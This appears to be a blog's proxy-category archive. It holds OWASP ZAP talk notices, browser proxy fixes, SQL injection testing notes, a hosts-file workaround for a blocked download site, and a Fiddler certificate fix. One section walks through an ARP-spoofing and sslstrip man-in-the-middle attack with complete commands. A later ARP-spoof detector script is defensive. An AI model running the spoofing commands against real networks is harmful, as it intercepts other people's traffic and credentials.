Archive for the ‘proxy’ Category
The OWASP Zed Attack Proxy (ZAP) is an easy-to-use integrated penetration testing tool for finding vulnerabilities in web applications. Originally a fork of the Paros Proxy project, ZAP targets a wide range of software professionals, from software developers to penetration testers, on any platform that supports Java. Equipped with a myriad of features and support for custom add-ons, ZAP is fully documented in easy-to-understand language.
The session demonstrates how to set it up and how to use it.
Starts Saturday, November 22, 2014, at 12:15 PM. The session runs for about 1 hour.
Practical Security Testing For Developers Using OWASP ZAP at Dot Net Bangalore 3rd meet up on Feb 21 2015
Title: Practical Security Testing for Developers using OWASP ZAP
Abstract: Every time an application faces the world wide web, it inherently becomes vulnerable to attacks. The attackers range from script kiddies and joyriders to hobbyists who turn downright hostile. The earlier in the development cycle you find the vulnerabilities, the easier they are to fix and test. OWASP ZAP is a free and open source penetration testing tool for finding vulnerabilities in web applications; widely used by security professionals, it is also ideal for anyone new to web application security and includes features specifically aimed at developers. This session demonstrates some attacks against web applications and how OWASP ZAP can be used to find those vulnerabilities, both manually and in automated builds.
Gist: See live attacks against web applications and how OWASP ZAP can be used to find those vulnerabilities, both manually and in automated builds.
Time & Venue: 21 Feb 2015 @ Dot Net Bangalore 2nd meet up
Plug-n-Hack proposes new standards for integrating security tools with browsers, enabling communication between them. OWASP ZAP has built-in support for Plug-n-Hack (pnh), which lets you configure Firefox to change its proxy settings so that OWASP ZAP can watch Firefox's traffic.
Configuration is child's play. Point your browser to the ZAP proxy address, follow the instructions, and you are done, just like in the gif image below.
This changes Firefox to use a proxy configuration provided via the http://localhost:7070/proxy.pac file.
But if, out of curiosity, you went and changed the Firefox proxy settings to No Proxy, Auto-detect proxy settings for this network, or Use system proxy settings, then Firefox traffic would no longer be proxied through ZAP, which is expected, right? That works just fine.
However, when you want Firefox traffic to be proxied through ZAP again, you would paste the ZAP proxy address (http://localhost:7070/pnh) in Firefox again, and Firefox would then say "A provider with this name has already been configured".
What is your expectation now?
I don't know; as a user, my expectation when I pasted the http://localhost:7070/pnh URL in Firefox was that it should configure my browser to route its traffic via ZAP. But that does not happen.
How to fix it?
You can override the proxy settings yourself, or you can use pnh to clear and remove the configuration and then point Firefox to http://localhost:7070/pnh again.
Press Shift + F2 in Firefox, then run these two commands:
You may think you are connecting to a website over SSL, but did you forget to check for https in the address bar?
Victim – Windows 7 – 192.168.100.11
Attacker – Kali Linux – 192.168.100.215
arpspoof gateway – 192.168.100.1
• Flip your machine into forwarding mode.
echo "1" > /proc/sys/net/ipv4/ip_forward
• Run arpspoof to convince the network it should send its traffic to you.
arpspoof -i <interface> -t <targetIP> <gatewayIP>
arpspoof -i eth0 -t 192.168.100.11 192.168.100.1
• Set up iptables to redirect HTTP traffic to sslstrip.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
• Start sslstrip listening on that port.
sslstrip.py -l <listenPort>
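From the defender's side, the arpspoof step above leaves a trace in the victim's own ARP cache: the gateway's MAC changes, and one MAC starts answering for several IPs. The following added example (editor's code, not part of the original post) parses /proc/net/arp or Windows `arp -a` output and raises those two alerts; the snapshots and MAC addresses are constructed.

```python
import re
from typing import Dict, List

# Constructed sample snapshots (not captured from a real network): the victim's
# ARP cache before and after the gateway entry is poisoned. MACs are made up.
ARP_BEFORE = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.100.1    0x1         0x2         00:11:22:33:44:01     *        eth0
192.168.100.215  0x1         0x2         de:ad:be:ef:02:15     *        eth0
"""
ARP_AFTER = ARP_BEFORE.replace("00:11:22:33:44:01", "de:ad:be:ef:02:15")
IP_RE = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")
MAC_RE = re.compile(r"^([0-9a-f]{2}[:-]){5}[0-9a-f]{2}$", re.I)

def parse_arp_table(text: str) -> Dict[str, str]:
    """Map IP -> MAC from /proc/net/arp or Windows `arp -a` output.
    Lines without a leading IP (headers, "Interface:") are skipped, as are
    incomplete entries and broadcast/multicast MACs (group bit set)."""
    table: Dict[str, str] = {}
    for line in text.splitlines():
        fields = line.split()
        if not fields or not IP_RE.match(fields[0]):
            continue
        macs = [f for f in fields[1:] if MAC_RE.match(f)]
        if not macs:
            continue
        mac = macs[0].lower().replace("-", ":")
        if mac == "00:00:00:00:00:00" or int(mac[:2], 16) & 1:
            continue
        table[fields[0]] = mac
    return table

def arp_spoof_alerts(baseline: Dict[str, str], current: Dict[str, str],
                     gateway_ip: str) -> List[str]:
    """Flag a changed gateway MAC and any MAC that now answers for several IPs."""
    alerts: List[str] = []
    old, new = baseline.get(gateway_ip), current.get(gateway_ip)
    if old and new and old != new:
        alerts.append(f"gateway {gateway_ip} MAC changed {old} -> {new}")
    by_mac: Dict[str, List[str]] = {}
    for ip, mac in current.items():
        by_mac.setdefault(mac, []).append(ip)
    for mac, ips in sorted(by_mac.items()):
        if len(ips) > 1:
            alerts.append(f"MAC {mac} claims {len(ips)} IPs: {', '.join(sorted(ips))}")
    return alerts

def check_snapshots(before: str, after: str, gateway_ip: str) -> List[str]:
    return arp_spoof_alerts(parse_arp_table(before), parse_arp_table(after), gateway_ip)
```

Run periodically against the live cache, this catches the poisoning regardless of whether sslstrip is behind it; a static ARP entry for the gateway or HSTS on the site are the corresponding mitigations.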
This video is for anyone who wants to know how to test an application for SQL injection. The content and presentation were focused on Quality Assurance personnel who are not penetration testers.
Quick introduction –
Browser add-ons for easy proxy switching
Intercepting proxies – Fiddler, OWASP ZAP, Burp Suite, ..?
Fuzzing and identifying vulnerable parameters
Code review pointers for Buddy testing
Demonstration: Fiddler, ZAP, sqlmap, SQL Inject Me
Firsthand experience with SQLi tools (Vijay/Shashank)
Chrome extension (open from the Chrome browser) – https://chrome.google.com/webstore/detail/foxyproxy-standard/gcknhkkoolaabfmlnjonogaaifnjlfnp?hl=en
Firefox extension (open from Firefox) – https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/
Scroll to the solution section if you want to skip the rant.
It's May 1, I live in India, I desperately wanted to download some learning material, and uploaded.net is blocked here. Well, say 'fuck' to the government's censorship. I used to think it was the imbecile firewall at my office, but when I tried on my home internet recently, IE gives PCBD and Chrome gives you a bummer. I did not want to use a web proxy right off, because sometimes they just do not work with AJAX-enabled, cookie-enabled websites. And most of them do not support file downloads (at least in my experience; maybe I haven't tried harder).
I hate it when security builders leave loopholes and hide behind the security industry's infamous line, 'Nothing is 100% secure'. Well, you forgot the basics. When you block a website, you don't block it based on the domain name. You've got to be more advanced than a school kid using a firewall.
I will show you a simple hosts file entry technique here to bypass the tyranny.
Wow, don't I relish and cherish being a computer engineer. Happy labor day.
When you try to access uploaded.net, you can't connect to the server, for both the http and https versions of the links. Your nslookup and ping fail. Somehow you manage to get the IP of uploaded.net from online DNS lookup websites, and instead of http://uploaded.net you try the IP http://184.108.40.206/; even then you can't connect.
1. Go to your favorite DNS lookup website; mine happens to be http://ping.eu/nslookup/
2. Look up http://uploaded.net and get the IP address.
3. Add a hosts file entry mapping uploaded.net to 220.127.116.11. (Remember, the IP address of uploaded.net may have changed since the time of this writing.) The Windows hosts file is at C:\Windows\System32\drivers\etc\hosts; the Linux hosts file is at /etc/hosts. Open Notepad as admin (if UAC is enabled in Windows Vista or above), or on Linux use sudo with your favorite text editor (e.g. gedit) if not running as root.
4. Save the hosts file and breathe the air of liberation (and a free chick ad).
5. Click Free Download, or Premium Download (if you own a villa and don't happen to be a miser).
6. Once your download link is generated, you get another bummer: this time the URL in the address bar is a subdomain of uploaded.net with a different IP address, and hence blocked. Hang on, let's copy the complete FQDN of the server and do a DNS lookup at http://ping.eu/nslookup/
7. A DNS lookup of http://fra-7m15-stor07.uploaded.net/ at http://ping.eu/nslookup yields an IP, 18.104.22.168. Add a hosts entry for that server and IP. (Note: the download server may vary based on your location; make sure you copy the correct server name from the address bar for the DNS lookup.)
8. Go back to your browser and hit the refresh button. See the magic.
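As an added example that is not part of the original post: a small Python helper that applies steps 3 and 7 to a hosts file idempotently (it replaces a stale mapping rather than appending a duplicate that the earlier line would shadow) and resolves a name the way the file does, so the entry can be verified before refreshing the browser. The sample hosts content is constructed.

```python
import ipaddress
from typing import List, Optional, Tuple

# Constructed sample hosts file (not copied from any real machine).
SAMPLE_HOSTS = """\
# constructed sample
127.0.0.1   localhost
::1         localhost ip6-localhost
10.0.0.5    uploaded.net   # stale entry from an earlier lookup
"""

def _split(line: str) -> Tuple[str, List[str], str]:
    """Return (ip, [names], comment) for one hosts line; names is empty for blanks/comments."""
    body, sep, comment = line.partition("#")
    fields = body.split()
    return (fields[0] if fields else ""), fields[1:], (sep + comment if sep else "")

def resolve_from_hosts(hosts_text: str, hostname: str) -> Optional[str]:
    """Address the hosts file gives for hostname; first match wins, as resolvers do."""
    host = hostname.lower()
    for line in hosts_text.splitlines():
        ip, names, _ = _split(line)
        if host in (n.lower() for n in names):
            return ip
    return None

def upsert_hosts_entry(hosts_text: str, hostname: str, ip: str) -> str:
    """Return hosts_text with hostname mapped to ip, removing any earlier mapping.
    Raises ValueError if ip is not a valid IPv4/IPv6 address."""
    ipaddress.ip_address(ip)
    host = hostname.lower()
    out: List[str] = []
    for line in hosts_text.splitlines():
        old_ip, names, comment = _split(line)
        if host in (n.lower() for n in names):
            names = [n for n in names if n.lower() != host]
            if not names:
                continue  # the line mapped only this host: drop it entirely
            line = f"{old_ip} {' '.join(names)}" + (f"  {comment}" if comment else "")
        out.append(line)
    out.append(f"{ip} {hostname}")
    return "\n".join(out) + "\n"
```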
Once again, happy labor day!
Update – Aug 9 2014 – A commenter said it does not work anymore, so here's a screenshot for you today. Still works.
This post is the solution taken directly from http://harachie.wordpress.com/2011/04/05/fiddler-creation-of-interception-certificate-failed/. I find myself doing this a couple of times every month and keep googling for it, so I thought I'd keep a copy of the post myself.
If you get the Fiddler error:
Unable to Generate Certificate
Creation of the interception certificate failed.
makecert.exe returned -1.
Results from C:\Program Files (x86)\Fiddler2\MakeCert.exe -r -ss my -n "CN=DO_NOT_TRUST_FiddlerRoot, O=DO_NOT_TRUST, OU=Created by http://www.fiddler2.com" -sky signature -eku 22.214.171.124.126.96.36.199.1 -h 1 -cy authority -a sha1 -m 132 -b 04/29/2013
Error: Can’t create the key of the subject (‘JoeSoft’)
and delete the contents of the folder.